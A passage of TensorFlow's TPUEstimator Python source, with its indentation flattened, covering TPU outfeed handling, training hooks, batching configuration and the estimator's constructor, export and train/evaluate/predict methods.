dequeue_ops.append([])
for dtype in self._tensor_dtypes[name]:
tensor_dtypes.append(dtype)
for shape in self._tensor_shapes[name]:
tensor_shapes.append(shape)
# Outfeed ops execute on each replica's first logical core. Note: we must
# constraint it such that we have at most one outfeed dequeue and enqueue
# per replica.
for i in xrange(self._ctx.num_replicas):
host_device, ordinal_id = self._ctx.device_for_replica(i)
with tf.compat.v1.device(host_device):
outfeed_tensors = tpu_ops.outfeed_dequeue_tuple(
dtypes=tensor_dtypes,
shapes=tensor_shapes,
device_ordinal=ordinal_id)
for j, item in enumerate(outfeed_tensors):
dequeue_ops[j].append(item)
# Deconstruct dequeue ops.
flat_dequeue_ops = []
for l in dequeue_ops:
flat_dequeue_ops.extend(l)
dequeue_ops_by_name = {}
pos = 0
for name in self._names:
dequeue_ops_by_name[name] = dequeue_ops[pos:pos +
len(self._tensors[name])]
pos += len(self._tensors[name])
def _call_host_fn(fn, *args, **kw):
context = CatchInvalidHostcallFunctions()
context.Enter()
result = fn(*args, **kw)
context.Exit()
context.ExitResult(result)
return result
# It is assumed evaluation always happens on single host TPU system. So,
# place all ops on tpu host if possible.
#
# TODO(jhseu): Evaluate whether this is right for summaries.
with tf.compat.v1.device(self._ctx.tpu_host_placement_function(replica_id=0)):
for name in self._names:
dequeue_ops = dequeue_ops_by_name[name]
for i, item in enumerate(dequeue_ops):
# TODO(xiejw): Make the specification of the outfeed combinaton
# function more explicit and well-documented. We may want to give the
# user the option of concatenating along any axis.
if (self._ctx.config.tpu_config.per_host_input_for_training is
tpu_config.InputPipelineConfig.BROADCAST):
# If the infeed is in BROADCAST mode (each core recieving the same
# input), then we assume that the cores also produce identical
# copies of the same output, and we simply take the output from
# the first core. This mode is used by Mesh-TensorFlow.
with tf.control_dependencies(dequeue_ops[i]):
dequeue_ops[i] = tf.identity(dequeue_ops[i][0])
else:
if dequeue_ops[i][0].shape.ndims == 0:
raise RuntimeError(
'All tensors outfed from TPU should preserve batch size '
'dimension, but got scalar {}'.format(dequeue_ops[i][0]))
# Assume that the input has been batch-split and that axis 0 of the
# output tensors represents the batch size. Concatenate along
# the axis 0 to re-combine the batch.
dequeue_ops[i] = tf.concat(dequeue_ops[i], axis=0)
if self._tensor_keys[name] is not None:
# The user-provided eval_metrics[1] is a dict.
dequeue_ops = dict(zip(self._tensor_keys[name], dequeue_ops))
try:
ret[name] = _call_host_fn(self._host_fns[name], **dequeue_ops)
except TypeError as e:
tf.compat.v1.logging.warn(
'Exception while calling %s: %s. It is likely the tensors '
'(%s[1]) do not match the '
'function\'s arguments', name, e, name)
raise
else:
ret[name] = _call_host_fn(self._host_fns[name], *dequeue_ops)
# force all dequeue operations to be run if not consumed by the host calls
ret['__force_dequeue'] = tf.group(*flat_dequeue_ops)
return ret
class _OutfeedHostCallHook(tf.compat.v1.train.SessionRunHook):
"""Hook to run host calls when use_tpu=False."""
def __init__(self, tensors):
self._tensors = tensors
def begin(self):
# We duplicate this code from the TPUInfeedOutfeedSessionHook rather than
# create a separate hook to guarantee execution order, because summaries
# need to be initialized before the outfeed thread starts.
# TODO(jhseu): Make a wrapper hook instead?
self._init_ops = contrib_summary.summary_writer_initializer_op()
# Get all the writer resources from the initializer, so we know what to
# flush.
self._finalize_ops = []
for op in self._init_ops:
self._finalize_ops.append(contrib_summary.flush(writer=op.inputs[0]))
def after_create_session(self, session, coord):
session.run(self._init_ops)
def before_run(self, run_context):
return tf.compat.v1.train.SessionRunArgs(self._tensors)
def end(self, session):
session.run(self._finalize_ops)
class ExamplesPerSecondHook(tf.compat.v1.train.StepCounterHook):
"""Calculate and report global_step/sec and examples/sec during runtime."""
def __init__(self,
batch_size,
every_n_steps=100,
every_n_secs=None,
output_dir=None,
summary_writer=None):
self._batch_size = batch_size
super(ExamplesPerSecondHook, self).__init__(
every_n_steps=every_n_steps,
every_n_secs=every_n_secs,
output_dir=output_dir,
summary_writer=summary_writer)
def _log_and_record(self, elapsed_steps, elapsed_time, global_step):
global_step_per_sec = elapsed_steps / elapsed_time
examples_per_sec = self._batch_size * global_step_per_sec
if self._summary_writer is not None:
global_step_summary = Summary(value=[
Summary.Value(tag='global_step/sec', simple_value=global_step_per_sec)
])
example_summary = Summary(value=[
Summary.Value(tag='examples/sec', simple_value=examples_per_sec)
])
self._summary_writer.add_summary(global_step_summary, global_step)
self._summary_writer.add_summary(example_summary, global_step)
tf.compat.v1.logging.info('global_step/sec: %g', global_step_per_sec)
tf.compat.v1.logging.info('examples/sec: %g', examples_per_sec)
class InstallSignalHandlerHook(tf.compat.v1.train.SessionRunHook):
"""Change SIGINT (CTRL^C) handler to force quit the process.
The default behavior often results in hanging processes.
The original handler is restored after training/evaluation.
"""
def __init__(self):
self._signal_fn = signal.getsignal(signal.SIGINT)
def before_run(self, run_context):
signal.signal(signal.SIGINT, signal.SIG_DFL)
def end(self, session):
signal.signal(signal.SIGINT, self._signal_fn)
class ExportSavedModelApiVersion(enum.Enum):
V1 = 1
V2 = 2
class BatchConfig(
collections.namedtuple('BatchConfig', [
'num_batch_threads', 'max_batch_size', 'batch_timeout_micros',
'allowed_batch_sizes', 'max_enqueued_batches'
])):
"""Class to handle config inputs into the batching function."""
def __new__(cls,
num_batch_threads,
max_batch_size,
batch_timeout_micros,
allowed_batch_sizes,
max_enqueued_batches=10):
"""Creates an BatchConfig instance.
Args:
num_batch_threads: Number of scheduling threads for processing batches of
work. Determines the number of batches processed in parallel.
max_batch_size: Batch sizes will never be bigger than this.
batch_timeout_micros: Maximum number of microseconds to wait before
outputting an incomplete batch.
allowed_batch_sizes: Optional list of allowed batch sizes. If left empty,
does nothing. Otherwise, supplies a list of batch sizes, causing the op
to pad batches up to one of those sizes. The entries must increase
monotonically, and the final entry must equal max_batch_size.
max_enqueued_batches: The maximum depth of the batch queue. Defaults to
10.
Returns:
An BatchConfig instance.
"""
return super(BatchConfig, cls).__new__(
cls,
num_batch_threads=num_batch_threads,
max_batch_size=max_batch_size,
batch_timeout_micros=batch_timeout_micros,
allowed_batch_sizes=allowed_batch_sizes,
max_enqueued_batches=max_enqueued_batches)
@estimator_export(v1=['estimator.tpu.TPUEstimator'])
class TPUEstimator(estimator_lib.Estimator):
"""Estimator with TPU support.
TPUEstimator also supports training on CPU and GPU. You don't need to define
a separate `tf.estimator.Estimator`.
TPUEstimator handles many of the details of running on TPU devices, such as
replicating inputs and models for each core, and returning to host
periodically to run hooks.
TPUEstimator transforms a global batch size in params to a per-shard batch
size when calling the `input_fn` and `model_fn`. Users should specify
global batch size in constructor, and then get the batch size for each shard
in `input_fn` and `model_fn` by `params['batch_size']`.
- For training, `model_fn` gets per-core batch size; `input_fn` may get
per-core or per-host batch size depending on `per_host_input_for_training`
in `TPUConfig` (See docstring for TPUConfig for details).
- For evaluation and prediction, `model_fn` gets per-core batch size and
`input_fn` get per-host batch size.
Evaluation
==========
`model_fn` should return `TPUEstimatorSpec`, which expects the `eval_metrics`
for TPU evaluation. If eval_on_tpu is False, the evaluation will execute on
CPU or GPU; in this case the following discussion on TPU evaluation does not
apply.
`TPUEstimatorSpec.eval_metrics` is a tuple of `metric_fn` and `tensors`, where
`tensors` could be a list of any nested structure of `Tensor`s (See
`TPUEstimatorSpec` for details). `metric_fn` takes the `tensors` and returns
a dict from metric string name to the result of calling a metric function,
namely a `(metric_tensor, update_op)` tuple.
One can set `use_tpu` to `False` for testing. All training, evaluation, and
predict will be executed on CPU. `input_fn` and `model_fn` will receive
`train_batch_size` or `eval_batch_size` unmodified as `params['batch_size']`.
Current limitations:
--------------------
1. TPU evaluation only works on a single host (one TPU worker) except
BROADCAST mode.
2. `input_fn` for evaluation should **NOT** raise an end-of-input exception
(`OutOfRangeError` or `StopIteration`). And all evaluation steps and all
batches should have the same size.
Example (MNIST):
----------------
```
# The metric Fn which runs on CPU.
def metric_fn(labels, logits):
predictions = tf.argmax(logits, 1)
return {
'accuracy': tf.compat.v1.metrics.precision(
labels=labels, predictions=predictions),
}
# Your model Fn which runs on TPU (eval_metrics is list in this example)
def model_fn(features, labels, mode, config, params):
...
logits = ...
if mode = tf.estimator.ModeKeys.EVAL:
return tpu_estimator.TPUEstimatorSpec(
mode=mode,
loss=loss,
eval_metrics=(metric_fn, [labels, logits]))
# or specify the eval_metrics tensors as dict.
def model_fn(features, labels, mode, config, params):
...
final_layer_output = ...
if mode = tf.estimator.ModeKeys.EVAL:
return tpu_estimator.TPUEstimatorSpec(
mode=mode,
loss=loss,
eval_metrics=(metric_fn, {
'labels': labels,
'logits': final_layer_output,
}))
```
Prediction
==========
Prediction on TPU is an experimental feature to support large batch inference.
It is not designed for latency-critical system. In addition, due to some
usability issues, for prediction with small dataset, CPU `.predict`, i.e.,
creating a new `TPUEstimator` instance with `use_tpu=False`, might be more
convenient.
Note: In contrast to TPU training/evaluation, the `input_fn` for prediction
*should* raise an end-of-input exception (`OutOfRangeError` or
`StopIteration`), which serves as the stopping signal to `TPUEstimator`. To be
precise, the ops created by `input_fn` produce one batch of the data.
The `predict()` API processes one batch at a time. When reaching the end of
the data source, an end-of-input exception should be raised by one of these
operations. The user usually does not need to do this manually. As long as the
dataset is not repeated forever, the `tf.data` API will raise an end-of-input
exception automatically after the last batch has been produced.
Note: Estimator.predict returns a Python generator. Please consume all the
data from the generator so that TPUEstimator can shutdown the TPU system
properly for user.
Current limitations:
--------------------
1. TPU prediction only works on a single host (one TPU worker).
2. `input_fn` must return a `Dataset` instance rather than `features`. In
fact, .train() and .evaluate() also support Dataset as return value.
Example (MNIST):
----------------
```
height = 32
width = 32
total_examples = 100
def predict_input_fn(params):
batch_size = params['batch_size']
images = tf.random.uniform(
[total_examples, height, width, 3], minval=-1, maxval=1)
dataset = tf.data.Dataset.from_tensor_slices(images)
dataset = dataset.map(lambda images: {'image': images})
dataset = dataset.batch(batch_size)
return dataset
def model_fn(features, labels, params, mode):
# Generate predictions, called 'output', from features['image']
if mode == tf.estimator.ModeKeys.PREDICT:
return tf.contrib.tpu.TPUEstimatorSpec(
mode=mode,
predictions={
'predictions': output,
'is_padding': features['is_padding']
})
tpu_est = TPUEstimator(
model_fn=model_fn,
...,
predict_batch_size=16)
# Fully consume the generator so that TPUEstimator can shutdown the TPU
# system.
for item in tpu_est.predict(input_fn=input_fn):
# Filter out item if the `is_padding` is 1.
# Process the 'predictions'
```
Exporting
=========
`export_saved_model` exports 2 metagraphs, one with `saved_model.SERVING`, and
another with `saved_model.SERVING` and `saved_model.TPU` tags. At serving
time, these tags are used to select the appropriate metagraph to load.
Before running the graph on TPU, the TPU system needs to be initialized. If
TensorFlow Serving model-server is used, this is done automatically. If not,
please use `session.run(tpu.initialize_system())`.
There are two versions of the API: ExportSavedModelApiVersion.V1 and V2.
In V1, the exported CPU graph is `model_fn` as it is. The exported TPU graph
wraps `tpu.rewrite()` and `TPUPartitionedCallOp` around `model_fn` so
`model_fn` is on TPU by default. To place ops on CPU,
`tpu.outside_compilation(host_call, logits)` can be used.
Example:
----------------
```
def model_fn(features, labels, mode, config, params):
...
logits = ...
export_outputs = {
'logits': export_output_lib.PredictOutput(
{'logits': logits})
}
def host_call(logits):
class_ids = math_ops.argmax(logits)
classes = string_ops.as_string(class_ids)
export_outputs['classes'] =
export_output_lib.ClassificationOutput(classes=classes)
tpu.outside_compilation(host_call, logits)
...
```
In V2, `export_saved_model()` sets up `params['use_tpu']` flag to let the user
know if the code is exporting to TPU (or not). When `params['use_tpu']` is
`True`, users need to call `tpu.rewrite()`, `TPUPartitionedCallOp` and/or
`batch_function()`. Alternatively use `inference_on_tpu()` which is a
convenience wrapper of the three.
```
def model_fn(features, labels, mode, config, params):
...
# This could be some pre-processing on CPU like calls to input layer with
# embedding columns.
x2 = features['x'] * 2
def computation(input_tensor):
return layers.dense(
input_tensor, 1, kernel_initializer=init_ops.zeros_initializer())
inputs = [x2]
if params['use_tpu']:
predictions = array_ops.identity(
tpu_estimator.inference_on_tpu(computation, inputs,
num_batch_threads=1, max_batch_size=2, batch_timeout_micros=100),
name='predictions')
else:
predictions = array_ops.identity(
computation(*inputs), name='predictions')
key = signature_constants.DEFAULT_SERVING_SIGNATURE_DEF_KEY
export_outputs = {
key: export_lib.PredictOutput({'prediction': predictions})
}
...
```
TIP: V2 is recommended as it is more flexible (eg: batching, etc).
"""
def __init__(self,
model_fn=None,
model_dir=None,
config=None,
params=None,
use_tpu=True,
train_batch_size=None,
eval_batch_size=None,
predict_batch_size=None,
batch_axis=None,
eval_on_tpu=True,
export_to_tpu=True,
export_to_cpu=True,
warm_start_from=None,
embedding_config_spec=None,
export_saved_model_api_version=ExportSavedModelApiVersion.V1):
"""Constructs an `TPUEstimator` instance.
Args:
model_fn: Model function as required by `Estimator` which returns
EstimatorSpec or TPUEstimatorSpec. `training_hooks`, 'evaluation_hooks',
and `prediction_hooks` must not capure any TPU Tensor inside the
model_fn.
model_dir: Directory to save model parameters, graph and etc. This can
also be used to load checkpoints from the directory into a estimator to
continue training a previously saved model. If `None`, the model_dir in
`config` will be used if set. If both are set, they must be same. If
both are `None`, a temporary directory will be used.
config: An `tpu_config.RunConfig` configuration object. Cannot be `None`.
params: An optional `dict` of hyper parameters that will be passed into
`input_fn` and `model_fn`. Keys are names of parameters, values are
basic python types. There are reserved keys for `TPUEstimator`,
including 'batch_size'.
use_tpu: A bool indicating whether TPU support is enabled. Currently, -
TPU training and evaluation respect this bit, but eval_on_tpu can
override execution of eval. See below.
train_batch_size: An int representing the global training batch size.
TPUEstimator transforms this global batch size to a per-shard batch
size, as params['batch_size'], when calling `input_fn` and `model_fn`.
Cannot be `None` if `use_tpu` is `True`. Must be divisible by total
number of replicas.
eval_batch_size: An int representing evaluation batch size. Must be
divisible by total number of replicas.
predict_batch_size: An int representing the prediction batch size. Must be
divisible by total number of replicas.
batch_axis: A python tuple of int values describing how each tensor
produced by the Estimator `input_fn` should be split across the TPU
compute shards. For example, if your input_fn produced (images, labels)
where the images tensor is in `HWCN` format, your shard dimensions would
be [3, 0], where 3 corresponds to the `N` dimension of your images
Tensor, and 0 corresponds to the dimension along which to split the
labels to match up with the corresponding images. If None is supplied,
and per_host_input_for_training is True, batches will be sharded based
on the major dimension. If tpu_config.per_host_input_for_training is
False or `PER_HOST_V2`, batch_axis is ignored.
eval_on_tpu: If False, evaluation runs on CPU or GPU. In this case, the
model_fn must return `EstimatorSpec` when called with `mode` as `EVAL`.
export_to_tpu: If True, `export_saved_model()` exports a metagraph for
serving on TPU. Note that unsupported export modes such as EVAL will be
ignored. For those modes, only a CPU model will be exported.
Currently, export_to_tpu only supports PREDICT.
export_to_cpu: If True, `export_saved_model()` exports a metagraph for
serving on CPU.
warm_start_from: Optional string filepath to a checkpoint or SavedModel to
warm-start from, or a `tf.estimator.WarmStartSettings` object to fully
configure warm-starting. If the string filepath is provided instead of
a `WarmStartSettings`, then all variables are warm-started, and it is
assumed that vocabularies and Tensor names are unchanged.
embedding_config_spec: Optional EmbeddingConfigSpec instance
to support using TPU embedding.
export_saved_model_api_version: ExportSavedModelApiVersion, V1 or V2.
With V1, `export_saved_model()` adds rewrite() and TPUPartitionedCallOp()
for user; while in v2, user is expected to add rewrite(),
TPUPartitionedCallOp() etc in their model_fn.
A helper function `inference_on_tpu` is provided for V2.
brn_tpu_estimator.py includes examples for both versions
i.e. TPUEstimatorExportTest and TPUEstimatorExportV2Test.
Raises:
ValueError: `params` has reserved keys already.
"""
if config is None or not isinstance(config, tpu_config.RunConfig):
raise ValueError(
'`config` must be provided with type `tpu_config.RunConfig`')
if params is not None and any(k in params for k in _RESERVED_PARAMS_KEYS):
raise ValueError('{} are reserved keys but existed in params {}.'.format(
_RESERVED_PARAMS_KEYS, params))
if use_tpu:
# Perform some very basic validations. More validations will be found in
# _InternalTPUContext.
if train_batch_size is None:
raise ValueError('`train_batch_size` cannot be `None`')
util_lib.check_positive_integer(train_batch_size, 'train_batch_size')
if (config.tpu_config.per_host_input_for_training is
tpu_config.InputPipelineConfig.PER_SHARD_V1 and
config.tpu_config.num_cores_per_replica):
raise ValueError(
'Model parallelism only supports per host input for training. '
'Please adjust TPURunconfig.per_host_input_for_training.')
if eval_batch_size is not None:
util_lib.check_positive_integer(eval_batch_size, 'eval_batch_size')
if predict_batch_size is not None:
util_lib.check_positive_integer(predict_batch_size,
'predict_batch_size')
if embedding_config_spec:
if (config.tpu_config.per_host_input_for_training not in
(tpu_config.InputPipelineConfig.PER_HOST_V1,
tpu_config.InputPipelineConfig.PER_HOST_V2)):
raise ValueError('Only PER_HOST_V1 and PER_HOST_V2 is supported when '
'using TPU Embedding; got {}.'.format(
config.tpu_config.per_host_input_for_training))
self._embedding_from_feature_columns = (
embedding_config_spec.feature_columns is not None)
if (not (use_tpu and eval_on_tpu) and embedding_config_spec and
embedding_config_spec.partition_strategy == 'mod'):
raise ValueError('Mod sharding of embedding tables not supported on '
'CPU.')
# Verifies the model_fn signature according to Estimator framework.
estimator_lib._verify_model_fn_args(model_fn, params) # pylint: disable=protected-access
# We cannot store config and params in this constructor as parent
# constructor might change them, such as assigning a temp dir for
# config.model_dir.
model_function = self._augment_model_fn(model_fn, batch_axis)
# Overwrite log_step_count_steps to disable TensorLoggingHook and
# StepCounterHook from being created in Estimator. TPUEstimator already
# added equivalent hooks in _augment_model_fn above.
self._log_every_n_steps = config.log_step_count_steps
config = config.replace(log_step_count_steps=None)
# Passing non-None params as wrapped model_fn has it.
params = params or {}
super(TPUEstimator, self).__init__(
model_fn=model_function,
model_dir=model_dir,
config=config,
params=params,
warm_start_from=warm_start_from)
self._iterations_per_training_loop = util_lib.parse_iterations_per_loop(
self._config.tpu_config.iterations_per_loop)
# In absence of an explicit `log_every_n_secs` config, if the
# `iterations_per_loop` value is specified as time in seconds, enable
# logging every n secs based on the `iterations_per_loop` value. A trade-off
# avoiding API change on the current release.
# TODO(henrytan): add `log_every_n_secs` to RunConfig.
if self._iterations_per_training_loop.unit == 'seconds':
self._log_every_n_secs = self._iterations_per_training_loop.value
self._log_every_n_steps = None
elif self._iterations_per_training_loop.unit == 'count':
if self._log_every_n_steps is not None:
# Each session.run() lasts for iterations_per_loop. We can't log
# in-between a session.run(), and we can only log after the
# `iterations_per_loop` steps, so we can only approximate. If a user
# requests to log every N steps, we actually want to roughly log every
# N / `iterations_per_loop` steps to match the original intention.
self._log_every_n_steps = (
int(math.ceil(float(self._log_every_n_steps) /
self._iterations_per_training_loop.value)))
self._log_every_n_secs = None
else:
assert False, ('Invalid TPUConfig `iterations_per_loop` value. '
'Indicates a bug in `iterations_per_loop` '
'parsing.')
# All properties passed to _InternalTPUContext are immutable.
# pylint: disable=protected-access
self._ctx = tpu_context._get_tpu_context(
self._config, train_batch_size, eval_batch_size, predict_batch_size,
use_tpu, eval_on_tpu, embedding_config_spec)
self._export_to_cpu = export_to_cpu
self._export_to_tpu = export_to_tpu
if not isinstance(export_saved_model_api_version,
ExportSavedModelApiVersion):
raise ValueError('export_saved_model_api_version should be of type '
'ExportSavedModelApiVersion; got {}.'.format(
export_saved_model_api_version))
self._export_saved_model_api_version = export_saved_model_api_version
self._is_input_fn_invoked = None
self._rendezvous = {}
def _add_meta_graph_for_mode(self,
builder,
input_receiver_fn_map,
checkpoint_path,
save_variables=True,
mode=model_fn_lib.ModeKeys.PREDICT,
export_tags=None,
check_variables=True,
strip_default_attrs=True):
if self._export_to_tpu and mode != model_fn_lib.ModeKeys.PREDICT:
tf.compat.v1.logging.warn('TPUEstimator only handles mode PREDICT for exporting '
'when `export_to_tpu` is `True`; Mode {} will be ignored '
'for TPU.'.format(mode))
if not self._export_to_cpu and not self._export_to_tpu:
raise ValueError('One of export_to_cpu and export_to_tpu must be true.')
if self._export_to_cpu:
(super(TPUEstimator, self)._add_meta_graph_for_mode(
builder,
input_receiver_fn_map,
checkpoint_path,
save_variables,
mode=mode,
export_tags=export_tags,
check_variables=check_variables,
strip_default_attrs=strip_default_attrs))
if self._export_to_tpu and mode == model_fn_lib.ModeKeys.PREDICT:
input_receiver_fn_map = {
_INFERENCE_ON_TPU_MODE: input_receiver_fn_map[mode]
}
export_tags = [tf.saved_model.SERVING, tf.saved_model.TPU]
mode = _INFERENCE_ON_TPU_MODE
# See b/110052256 for why `check_variables` is `False`.
if not self._export_to_cpu:
check_variables = save_variables = True
else:
check_variables = save_variables = False
(super(TPUEstimator, self)._add_meta_graph_for_mode(
builder,
input_receiver_fn_map,
checkpoint_path,
save_variables=save_variables,
mode=mode,
export_tags=export_tags,
check_variables=check_variables,
strip_default_attrs=strip_default_attrs))
def _call_model_fn(self, features, labels, mode, config):
if mode == _INFERENCE_ON_TPU_MODE:
context = tpu._TPUInferenceContext('tpu_inference', check_ops=False)
try:
context.Enter()
if self._export_saved_model_api_version == ExportSavedModelApiVersion.V1:
result = self._call_model_fn_for_inference(features, labels, mode,
config)
else:
result = super(TPUEstimator, self)._call_model_fn(
features, labels, mode, config)
finally:
context.Exit()
return result
else:
return super(TPUEstimator, self)._call_model_fn(features, labels, mode,
config)
def _call_model_fn_for_inference(self, features, labels, mode, config):
"""Wraps `_call_model_fn` for `export_saved_model`."""
if mode != _INFERENCE_ON_TPU_MODE:
raise ValueError('mode must be {}; '
'got {}.'.format(_INFERENCE_ON_TPU_MODE, mode))
return model_fn_inference_on_tpu(
self._model_fn,
features,
labels,
config,
self._params,
batch_config=None)
def _create_global_step(self, graph):
"""Creates a global step suitable for TPUs.
Args:
graph: The graph in which to create the global step.
Returns:
A global step `Tensor`.
Raises:
ValueError: if the global step tensor is already defined.
"""
return _create_global_step(graph)
def _convert_train_steps_to_hooks(self, steps, max_steps):
with self._ctx.with_mode(model_fn_lib.ModeKeys.TRAIN) as ctx:
if ctx.is_running_on_cpu():
return super(TPUEstimator, self)._convert_train_steps_to_hooks(
steps, max_steps)
# On TPU.
if steps is None and max_steps is None:
raise ValueError(
'For TPU training, one of `steps` or `max_steps` must be set. '
'Cannot be both `None`.')
# Estimator.train has explicit positiveness check.
if steps is not None:
util_lib.check_positive_integer(steps, 'Train steps')
if max_steps is not None:
util_lib.check_positive_integer(max_steps, 'Train max_steps')
return [
_TPUStopAtStepHook(
self._iterations_per_training_loop, steps, max_steps)
]
def _convert_eval_steps_to_hooks(self, steps):
with self._ctx.with_mode(model_fn_lib.ModeKeys.EVAL) as ctx:
if ctx.is_running_on_cpu():
return super(TPUEstimator, self)._convert_eval_steps_to_hooks(steps)
if steps is None:
raise ValueError('Evaluate `steps` must be set on TPU. Cannot be `None`.')
util_lib.check_positive_integer(steps, 'Eval steps')
return [
evaluation._StopAfterNEvalsHook( # pylint: disable=protected-access
num_evals=steps),
_SetEvalIterationsHook(steps)
]
def _call_input_fn(self, input_fn, mode, input_context=None):
"""Calls the input function.
Args:
input_fn: The input function.
mode: ModeKeys
input_context: Optional instance of `tf.distribute.InputContext`.
Returns:
In TPU mode, returns an input_fn to be called later in model_fn.
Otherwise, calls the input_fn and returns either fatures or
(features, labels).
Raises:
ValueError: if input_fn takes invalid arguments or does not have `params`.
"""
input_fn_args = function_utils.fn_args(input_fn)
config = self.config # a deep copy.
kwargs = {}
if 'params' in input_fn_args:
kwargs['params'] = self.params # a deep copy.
else:
raise ValueError('input_fn ({}) does not include params argument, '
'required by TPUEstimator to pass batch size as '
'params["batch_size"]'.format(input_fn))
if 'config' in input_fn_args:
kwargs['config'] = config
if 'mode' in input_fn_args:
kwargs['mode'] = mode
if 'input_context' in input_fn_args:
kwargs['input_context'] = input_context
# Records the fact input_fn has been invoked.
self._is_input_fn_invoked = True
with self._ctx.with_mode(mode) as ctx:
if (ctx.is_running_on_cpu() and
ctx.is_input_slice_broadcast_to_all_cores()):
raise ValueError('Invalid TPUConfig `eval_training_input_configuration`'
' value. SLICED mode only works on use_tpu = True.')
# Setting the batch size in params first. This helps user to have same
# input_fn for use_tpu=True/False.
batch_size_for_input_fn = ctx.batch_size_for_input_fn
if batch_size_for_input_fn is not None:
_add_item_to_params(kwargs['params'], _BATCH_SIZE_KEY,
batch_size_for_input_fn)
# For export_saved_model, input_fn is never passed to Estimator. So,
# `is_export_mode` must be False.
if ctx.is_running_on_cpu(is_export_mode=False):
with tf.compat.v1.device('/device:CPU:0'):
return input_fn(**kwargs)
# For TPU computation, input_fn should be invoked in a tf.while_loop for
# performance. While constructing the tf.while_loop, the structure of
# inputs returned by the `input_fn` needs to be recorded. The structure
# includes whether features or labels is dict or single Tensor, dict keys,
# tensor shapes, and dtypes. The recorded structure is used to create the
# infeed dequeue ops, which must be wrapped and passed as a Fn, called
# inside the TPU computation, as the TPU computation is wrapped inside a
# tf.while_loop also. So, we either pass input_fn to model_fn or pass
# dequeue_fn to model_fn. Here, `input_fn` is passed directly as
# `features` in `model_fn` signature.
def _input_fn(ctx):
_add_item_to_params(kwargs['params'], _CTX_KEY, ctx)
return input_fn(**kwargs)
return _input_fn
def _validate_features_in_predict_input(self, result):
"""Skip the validation.
For TPUEstimator, we do not need to check the result type. `_InputPipeline`
has stronger check. Parent class's check generates confusing warning msg.
Args:
result: `features` returned by input_fn.
"""
pass
def train(self,
input_fn,
hooks=None,
steps=None,
max_steps=None,
saving_listeners=None):
rendezvous = error_handling.ErrorRendezvous(num_sources=3)
self._rendezvous[model_fn_lib.ModeKeys.TRAIN] = rendezvous
try:
return super(TPUEstimator, self).train(
input_fn=input_fn,
hooks=hooks,
steps=steps,
max_steps=max_steps,
saving_listeners=saving_listeners)
except Exception: # pylint: disable=broad-except
rendezvous.record_error('training_loop', sys.exc_info())
finally:
rendezvous.record_done('training_loop')
rendezvous.raise_errors()
def evaluate(self,
input_fn,
steps=None,
hooks=None,
checkpoint_path=None,
name=None):
rendezvous = error_handling.ErrorRendezvous(num_sources=3)
self._rendezvous[model_fn_lib.ModeKeys.EVAL] = rendezvous
try:
return super(TPUEstimator, self).evaluate(
input_fn,
steps=steps,
hooks=hooks,
checkpoint_path=checkpoint_path,
name=name)
except Exception: # pylint: disable=broad-except
rendezvous.record_error('evaluation_loop', sys.exc_info())
finally:
rendezvous.record_done('evaluation_loop')
rendezvous.raise_errors()
def predict(self,
input_fn,
predict_keys=None,
hooks=None,
checkpoint_path=None,
yield_single_examples=True):
rendezvous = error_handling.ErrorRendezvous(num_sources=3)
self._rendezvous[model_fn_lib.ModeKeys.PREDICT] = rendezvous
try:
for result in super(TPUEstimator, self).predict(
input_fn=input_fn,
predict_keys=predict_keys,
hooks=hooks,
checkpoint_path=checkpoint_path,
yield_single_examples=yield_single_examples):
yield result
except Exception: # pylint: disable=broad-except
rendezvous.record_error('prediction_loop', sys.exc_info())
finally:
rendezvous.record_done('prediction_loop')
rendezvous.raise_errors()
rendezvous.record_done('prediction_loop')
rendezvous.raise_errors()
def _augment_model_fn(self, model_fn, batch_axis):
"""Returns a new model_fn, which wraps the TPU support."""
def _model_fn(features, labels, mode, config, params):
"""A Estimator `model_fn` for TPUEstimator."""
# `input_fn` is called in `train()`, `evaluate()`, and `predict()`,
# but not in `export_saved_model()`.
if self._is_input_fn_invoked:
is_export_mode = False
else:
is_export_mode = True
# Clear the bit.
self._is_input_fn_invoked = None
if is_export_mode:
if mode == _INFERENCE_ON_TPU_MODE:
_add_item_to_params(params, _USE_TPU_KEY, True)
mode = model_fn_lib.ModeKeys.PREDICT
else:
_add_item_to_params(params, _USE_TPU_KEY, False)
with self._ctx.with_mode(mode) as ctx:
model_fn_wrapper = _ModelFnWrapper(model_fn, config, params, ctx)
# examples_hook is added to training_hooks for both CPU and TPU
# execution.
if (self._log_every_n_steps is not None
or self._log_every_n_secs is not None):
examples_hook = ExamplesPerSecondHook(
ctx.global_batch_size,
# pylint:disable=g-long-ternary
output_dir=(self.model_dir
if not config or config.save_summary_steps
else None),
# pylint:enable=g-long-ternary
every_n_steps=self._log_every_n_steps,
every_n_secs=self._log_every_n_secs)
if ctx.is_running_on_cpu(is_export_mode=is_export_mode):
tf.compat.v1.logging.info('Running %s on CPU/GPU', mode)
estimator_spec = model_fn_wrapper.call_without_tpu(
features, labels, is_export_mode=is_export_mode)
if (self._log_every_n_steps is not None
or self._log_every_n_secs is not None):
estimator_spec = estimator_spec._replace(
training_hooks=estimator_spec.training_hooks + (examples_hook,))
return estimator_spec
assert labels is None, '`labels` passed to `model_fn` must be `None`.'
# TPUEstimator._call_input_fn passes `input_fn` as features to here.
assert callable(features), '`input_fn` is not callable.'
input_fn = features
tpu_init_ops = []
if ctx.embedding_config and mode == model_fn_lib.ModeKeys.TRAIN:
dummy_table_variables, dummy_table_variables_init = (
tpu_embedding_gradient.create_dummy_table_variables(
ctx.embedding_config.tpu_embedding))
ctx.embedding_config.dummy_table_variables = dummy_table_variables
tpu_init_ops.append(dummy_table_variables_init)
input_holders = _InputPipeline(input_fn, batch_axis, ctx)
enqueue_ops, dequeue_fn, input_hooks, run_infeed_loop_on_coordinator = (
input_holders.generate_infeed_enqueue_ops_and_dequeue_fn())
graph = tf.compat.v1.get_default_graph()
for enqueue_op in enqueue_ops:
if isinstance(enqueue_op, list):
graph.get_collection_ref(_TPU_ENQUEUE_OPS).extend(enqueue_op)
else:
graph.add_to_collection(_TPU_ENQUEUE_OPS, enqueue_op)
if mode == model_fn_lib.ModeKeys.TRAIN:
compile_op, loss, host_call, scaffold_fn, training_hooks = (
_train_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn))
if ctx.embedding_config:
g = tf.compat.v1.get_default_graph()
table_to_config_dict = (
ctx.embedding_config.tpu_embedding.table_to_config_dict)
optimization_parameters = (
ctx.embedding_config.tpu_embedding.optimization_parameters)
if self._embedding_from_feature_columns:
embedding_variable_name_by_table, slot_variable_names_by_table = (
_tpu_estimator_embedding.get_full_variable_names(
g, table_to_config_dict, optimization_parameters
)
)
else:
embedding_variable_name_by_table = None
slot_variable_names_by_table = None
